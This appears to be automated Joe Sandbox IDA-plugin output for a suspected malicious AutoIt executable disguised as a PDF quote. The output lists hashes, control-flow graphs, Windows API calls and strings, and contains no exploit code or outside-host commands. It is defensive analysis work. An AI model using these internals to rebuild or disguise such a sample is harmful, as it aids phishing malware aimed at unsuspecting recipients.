                                                                    • Opcode ID: 93046a8f94f2281f0a67be6147dfaa31070f7084d7c64d73a5e3cf04ac8029f2
                                                                    • Instruction ID: 2edf5ad5ffa7598fc57add0d959b985af5b0811469e7b76f3cf3094703e10185
                                                                    • Opcode Fuzzy Hash: 93046a8f94f2281f0a67be6147dfaa31070f7084d7c64d73a5e3cf04ac8029f2
                                                                    • Instruction Fuzzy Hash: E811A072240745BFD7208B66EC98F677BB9EBC9B51F10456CF505EA260DB71EC048660

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1006 e64afe-e64b5e call e677c7 GetVersionExW call e67d2c 1011 e64b64 1006->1011 1012 e64c69-e64c6b 1006->1012 1013 e64b67-e64b6c 1011->1013 1014 e9dac0-e9dacc 1012->1014 1016 e64b72 1013->1016 1017 e64c70-e64c71 1013->1017 1015 e9dacd-e9dad1 1014->1015 1018 e9dad3 1015->1018 1019 e9dad4-e9dae0 1015->1019 1020 e64b73-e64baa call e67e8c call e67886 1016->1020 1017->1020 1018->1019 1019->1015 1021 e9dae2-e9dae7 1019->1021 1029 e9dbbd-e9dbc0 1020->1029 1030 e64bb0-e64bb1 1020->1030 1021->1013 1023 e9daed-e9daf4 1021->1023 1023->1014 1025 e9daf6 1023->1025 1028 e9dafb-e9dafe 1025->1028 1031 e64bf1-e64c08 GetCurrentProcess IsWow64Process 1028->1031 1032 e9db04-e9db22 1028->1032 1033 e9dbd9-e9dbdd 1029->1033 1034 e9dbc2 1029->1034 1030->1028 1035 e64bb7-e64bc2 1030->1035 1042 e64c0d-e64c1e 1031->1042 1043 e64c0a 1031->1043 1032->1031 1036 e9db28-e9db2e 1032->1036 1040 e9dbc8-e9dbd1 1033->1040 1041 e9dbdf-e9dbe8 1033->1041 1037 e9dbc5 1034->1037 1038 e9db43-e9db49 1035->1038 1039 e64bc8-e64bca 1035->1039 1046 e9db38-e9db3e 1036->1046 1047 e9db30-e9db33 1036->1047 1037->1040 1050 e9db4b-e9db4e 1038->1050 1051 e9db53-e9db59 1038->1051 1048 e64bd0-e64bd3 1039->1048 1049 e9db5e-e9db6a 1039->1049 1040->1033 1041->1037 1052 e9dbea-e9dbed 1041->1052 1044 e64c20-e64c30 call e64c95 1042->1044 1045 e64c89-e64c93 GetSystemInfo 1042->1045 1043->1042 1063 e64c32-e64c3f call e64c95 1044->1063 1064 e64c7d-e64c87 GetSystemInfo 1044->1064 1058 e64c56-e64c66 1045->1058 1046->1031 1047->1031 1056 e9db8a-e9db8d 1048->1056 1057 e64bd9-e64be8 1048->1057 1053 e9db6c-e9db6f 1049->1053 1054 e9db74-e9db7a 1049->1054 1050->1031 1051->1031 1052->1040 1053->1031 1054->1031 1056->1031 1060 e9db93-e9dba8 1056->1060 1061 e9db7f-e9db85 1057->1061 1062 e64bee 1057->1062 1065 e9dbaa-e9dbad 1060->1065 1066 e9dbb2-e9dbb8 1060->1066 1061->1031 1062->1031 1071 e64c76-e64c7b 1063->1071 1072 e64c41-e64c45 GetNativeSystemInfo 1063->1072 1068 e64c47-e64c4b 1064->1068 1065->1031 1066->1031 1068->1058 1070 e64c4d-e64c50 FreeLibrary 1068->1070 1070->1058 1071->1072 1072->1068
                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 00E64B2B
                                                                      • Part of subcall function 00E67D2C: _memmove.LIBCMT ref: 00E67D66
                                                                    • GetCurrentProcess.KERNEL32(?,00EEFAEC,00000000,00000000,?), ref: 00E64BF8
                                                                    • IsWow64Process.KERNEL32(00000000), ref: 00E64BFF
                                                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00E64C45
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00E64C50
                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00E64C81
                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00E64C8D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                    • String ID:
                                                                    • API String ID: 1986165174-0
                                                                    • Opcode ID: 1ca23875244682866fdf51d47c637c0a06af68e46d9ebcde59f1a2327648c8eb
                                                                    • Instruction ID: e296e0f767a455d61cae894e4ce5e36fec5d3ac4719b38549d2a3409e8192d4a
                                                                    • Opcode Fuzzy Hash: 1ca23875244682866fdf51d47c637c0a06af68e46d9ebcde59f1a2327648c8eb
                                                                    • Instruction Fuzzy Hash: 0491E77158E7C4DECB31CB7895511AAFFE4AF25304B486A9DE0CBA7B41D220E948C719
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper
                                                                    • String ID: %
                                                                    • API String ID: 3964851224-2291192146
                                                                    • Opcode ID: b51f630c98e311d2f7fe87982ee4b7bc72982bca4a7c0bad4f5ff9ac6b00d7e5
                                                                    • Instruction ID: 3e3d8637d8ab6965144aed4e406e7434f75fff99e11e8dd843fd0841cbda65d5
                                                                    • Opcode Fuzzy Hash: b51f630c98e311d2f7fe87982ee4b7bc72982bca4a7c0bad4f5ff9ac6b00d7e5
                                                                    • Instruction Fuzzy Hash: F0927B71608341CFD724DF14C480B6AB7E1BF89318F14A96DE89AAB392D771EC45CB92
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,00E9E6F1), ref: 00EC44AB
                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00EC44BC
                                                                    • FindClose.KERNEL32(00000000), ref: 00EC44CC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                    • String ID:
                                                                    • API String ID: 48322524-0
                                                                    • Opcode ID: 6f924c6add4dc85b5474b0949f0512cdeb994131ed01f07d8e9d2e88499999e7
                                                                    • Instruction ID: 7ca24f3846c2128be7b9c0b674e7cc22069210b1bd58543596b2d3175b1997f7
                                                                    • Opcode Fuzzy Hash: 6f924c6add4dc85b5474b0949f0512cdeb994131ed01f07d8e9d2e88499999e7
                                                                    • Instruction Fuzzy Hash: A3E020718105045F4214B738EC5DDE9775CBF05335F204719F935E10E0E7745D1485D5
                                                                    Strings
                                                                    • Variable must be of type 'Object'., xrefs: 00EA41BB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Variable must be of type 'Object'.
                                                                    • API String ID: 0-109567571
                                                                    • Opcode ID: 7599eceaf42d8939c3a17a2eb3d8aabadb0bcda6f15b71471e7811dc44576050
                                                                    • Instruction ID: 3cd6958d352212aa6953d843abf0904ac7cd8870ea8943445f0784da3ab64aed
                                                                    • Opcode Fuzzy Hash: 7599eceaf42d8939c3a17a2eb3d8aabadb0bcda6f15b71471e7811dc44576050
                                                                    • Instruction Fuzzy Hash: FCA28C78A40205CFCB24CF58E480AAEB7B1FF59354F24A069E946BB391D771ED42CB91
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E70BBB
                                                                    • timeGetTime.WINMM ref: 00E70E76
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E70FB3
                                                                    • Sleep.KERNEL32(0000000A), ref: 00E70FC1
                                                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00E7105A
                                                                    • DestroyWindow.USER32 ref: 00E71066
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E71080
                                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 00EA51DC
                                                                    • TranslateMessage.USER32(?), ref: 00EA5FB9
                                                                    • DispatchMessageW.USER32(?), ref: 00EA5FC7
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EA5FDB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                    • API String ID: 4212290369-3242690629
                                                                    • Opcode ID: b1a532ab4a44e34dd985f9621be62cafed6cf935fcd1a0c7436ad6e1a7f2c485
                                                                    • Instruction ID: 9b7b21bda7e3310d1cd7315785875476db1189be127c75469c3334b08e5cd7bb
                                                                    • Opcode Fuzzy Hash: b1a532ab4a44e34dd985f9621be62cafed6cf935fcd1a0c7436ad6e1a7f2c485
                                                                    • Instruction Fuzzy Hash: 6DB2C271608741DFDB24DF24C884BAEB7E5BF89308F14991DF48AAB291D770E945CB82

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00EC9008: __time64.LIBCMT ref: 00EC9012
                                                                      • Part of subcall function 00E65045: _fseek.LIBCMT ref: 00E6505D
                                                                    • __wsplitpath.LIBCMT ref: 00EC92DD
                                                                      • Part of subcall function 00E8426E: __wsplitpath_helper.LIBCMT ref: 00E842AE
                                                                    • _wcscpy.LIBCMT ref: 00EC92F0
                                                                    • _wcscat.LIBCMT ref: 00EC9303
                                                                    • __wsplitpath.LIBCMT ref: 00EC9328
                                                                    • _wcscat.LIBCMT ref: 00EC933E
                                                                    • _wcscat.LIBCMT ref: 00EC9351
                                                                      • Part of subcall function 00EC904E: _memmove.LIBCMT ref: 00EC9087
                                                                      • Part of subcall function 00EC904E: _memmove.LIBCMT ref: 00EC9096
                                                                    • _wcscmp.LIBCMT ref: 00EC9298
                                                                      • Part of subcall function 00EC97DD: _wcscmp.LIBCMT ref: 00EC98CD
                                                                      • Part of subcall function 00EC97DD: _wcscmp.LIBCMT ref: 00EC98E0
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00EC94FB
                                                                    • _wcsncpy.LIBCMT ref: 00EC956E
                                                                    • DeleteFileW.KERNEL32(?,?), ref: 00EC95A4
                                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00EC95BA
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EC95CB
                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EC95DD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                    • String ID:
                                                                    • API String ID: 1500180987-0
                                                                    • Opcode ID: 148058167940cc5a735b3984e2ae4d561ca0e556dfb3bc9621842eab9ef03850
                                                                    • Instruction ID: 2b88c3b6574a360ff6f565845ef4d2d0c3ea96ee7b9c04a7669c080fe5dc34ad
                                                                    • Opcode Fuzzy Hash: 148058167940cc5a735b3984e2ae4d561ca0e556dfb3bc9621842eab9ef03850
                                                                    • Instruction Fuzzy Hash: 40C138B2E00219AACF21DF95CD85EDEBBB9EF44310F0050AAF609F6152DB319A458F65

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00E63074
                                                                    • RegisterClassExW.USER32(00000030), ref: 00E6309E
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E630AF
                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00E630CC
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E630DC
                                                                    • LoadIconW.USER32(000000A9), ref: 00E630F2
                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E63101
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                    • API String ID: 2914291525-1005189915
                                                                    • Opcode ID: f91ac0e4cd0529d1056b60ff445eeeeaea0a2606c59dc20375fee852cb14b969
                                                                    • Instruction ID: 01dd2d8e83c342a78176b9d905ba4ac6da3c162f22f270a4553902fcbb41fc7c
                                                                    • Opcode Fuzzy Hash: f91ac0e4cd0529d1056b60ff445eeeeaea0a2606c59dc20375fee852cb14b969
                                                                    • Instruction Fuzzy Hash: 512115B1950349EFDB50CFA5E889ADDBBF0FB08720F10412AF580AA2A0D3B50585DF90

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00E63074
                                                                    • RegisterClassExW.USER32(00000030), ref: 00E6309E
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E630AF
                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00E630CC
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E630DC
                                                                    • LoadIconW.USER32(000000A9), ref: 00E630F2
                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E63101
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                    • API String ID: 2914291525-1005189915
                                                                    • Opcode ID: 4dddc9b76691eb8ec41635a3ec18c152afa5889c5c33749caaf0d809bb1ac9c4
                                                                    • Instruction ID: 38021cf0ea0a9826c868704b57753d5b6a495c54a98c24adf49050f04d18e662
                                                                    • Opcode Fuzzy Hash: 4dddc9b76691eb8ec41635a3ec18c152afa5889c5c33749caaf0d809bb1ac9c4
                                                                    • Instruction Fuzzy Hash: CF21C5B195165CAFDB10DFA5E889BDDBBF4FB08B10F00812AF510BA2A0D7B145499F91

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00E64864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F252F8,?,00E637C0,?), ref: 00E64882
                                                                      • Part of subcall function 00E8068B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00E672C5), ref: 00E806AD
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E67308
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E9EC21
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E9EC62
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00E9ECA0
                                                                    • _wcscat.LIBCMT ref: 00E9ECF9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                    • API String ID: 2673923337-2727554177
                                                                    • Opcode ID: 0f5e2e7026075e5737cf89b6edd1af6494964cab9053296044d29a6927f1a339
                                                                    • Instruction ID: 1f50d56739728f9a94bf019d041d86ec133aaa781f658f2e1a925d48283ad714
                                                                    • Opcode Fuzzy Hash: 0f5e2e7026075e5737cf89b6edd1af6494964cab9053296044d29a6927f1a339
                                                                    • Instruction Fuzzy Hash: C671B071149345DECB14EF65EC8189BBBE8FF88344F40292EF589E72A1DB309909DB51

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 760 e63633-e63681 762 e63683-e63686 760->762 763 e636e1-e636e3 760->763 765 e636e7 762->765 766 e63688-e6368f 762->766 763->762 764 e636e5 763->764 769 e636ca-e636d2 DefWindowProcW 764->769 770 e9d24c-e9d27a call e711d0 call e711f3 765->770 771 e636ed-e636f0 765->771 767 e63695-e6369a 766->767 768 e6375d-e63765 PostQuitMessage 766->768 772 e9d2bf-e9d2d3 call ec281f 767->772 773 e636a0-e636a2 767->773 776 e63711-e63713 768->776 775 e636d8-e636de 769->775 805 e9d27f-e9d286 770->805 777 e63715-e6373c SetTimer RegisterWindowMessageW 771->777 778 e636f2-e636f3 771->778 772->776 796 e9d2d9 772->796 779 e63767-e63776 call e64531 773->779 780 e636a8-e636ad 773->780 776->775 777->776 781 e6373e-e63749 CreatePopupMenu 777->781 784 e9d1ef-e9d1f2 778->784 785 e636f9-e6370c KillTimer call e644cb call e63114 778->785 779->776 786 e636b3-e636b8 780->786 787 e9d2a4-e9d2ab 780->787 781->776 791 e9d228-e9d247 MoveWindow 784->791 792 e9d1f4-e9d1f6 784->792 785->776 794 e636be-e636c4 786->794 795 e6374b-e6375b call e645df 786->795 787->769 802 e9d2b1-e9d2ba call eb7f5e 787->802 791->776 799 e9d1f8-e9d1fb 792->799 800 e9d217-e9d223 SetFocus 792->800 794->769 794->805 795->776 796->769 799->794 806 e9d201-e9d212 call e711d0 799->806 800->776 802->769 805->769 810 e9d28c-e9d29f call e644cb call e643db 805->810 806->776 810->769
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00E636D2
                                                                    • KillTimer.USER32(?,00000001), ref: 00E636FC
                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E6371F
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E6372A
                                                                    • CreatePopupMenu.USER32 ref: 00E6373E
                                                                    • PostQuitMessage.USER32(00000000), ref: 00E6375F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                    • String ID: TaskbarCreated$%
                                                                    • API String ID: 129472671-3835587964
                                                                    • Opcode ID: 5cda6ccd9d6861e474e653d03b242c3cf3d7442ce58a6a8867fad4ce59466040
                                                                    • Instruction ID: ccef753e6aa19fdf33342fe6360ad495d5046174bdb6c533b426baca63b3c13e
                                                                    • Opcode Fuzzy Hash: 5cda6ccd9d6861e474e653d03b242c3cf3d7442ce58a6a8867fad4ce59466040
                                                                    • Instruction Fuzzy Hash: 0F413BB1184549FBDF249F74FC4DBBE3795EB10784F142126F502BA2E2DAB0AE05A361

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00E63A62
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00E63A71
                                                                    • LoadIconW.USER32(00000063), ref: 00E63A88
                                                                    • LoadIconW.USER32(000000A4), ref: 00E63A9A
                                                                    • LoadIconW.USER32(000000A2), ref: 00E63AAC
                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E63AD2
                                                                    • RegisterClassExW.USER32(?), ref: 00E63B28
                                                                      • Part of subcall function 00E63041: GetSysColorBrush.USER32(0000000F), ref: 00E63074
                                                                      • Part of subcall function 00E63041: RegisterClassExW.USER32(00000030), ref: 00E6309E
                                                                      • Part of subcall function 00E63041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E630AF
                                                                      • Part of subcall function 00E63041: InitCommonControlsEx.COMCTL32(?), ref: 00E630CC
                                                                      • Part of subcall function 00E63041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E630DC
                                                                      • Part of subcall function 00E63041: LoadIconW.USER32(000000A9), ref: 00E630F2
                                                                      • Part of subcall function 00E63041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E63101
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                    • String ID: #$0$AutoIt v3
                                                                    • API String ID: 423443420-4155596026
                                                                    • Opcode ID: f6ade1ea74a3030ceca1722c1f195c67e66816c3edc319da4e1dc8790370c583
                                                                    • Instruction ID: 243c330c65aefae9f7a8cc30e2c1581ced98cc1ac5a4d2156db20b808d543fd4
                                                                    • Opcode Fuzzy Hash: f6ade1ea74a3030ceca1722c1f195c67e66816c3edc319da4e1dc8790370c583
                                                                    • Instruction Fuzzy Hash: AC213CB195130CEFEB20DFA5EC49BAD7BB4EB08B11F00412AF500BA2E1D3B54655AF85

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
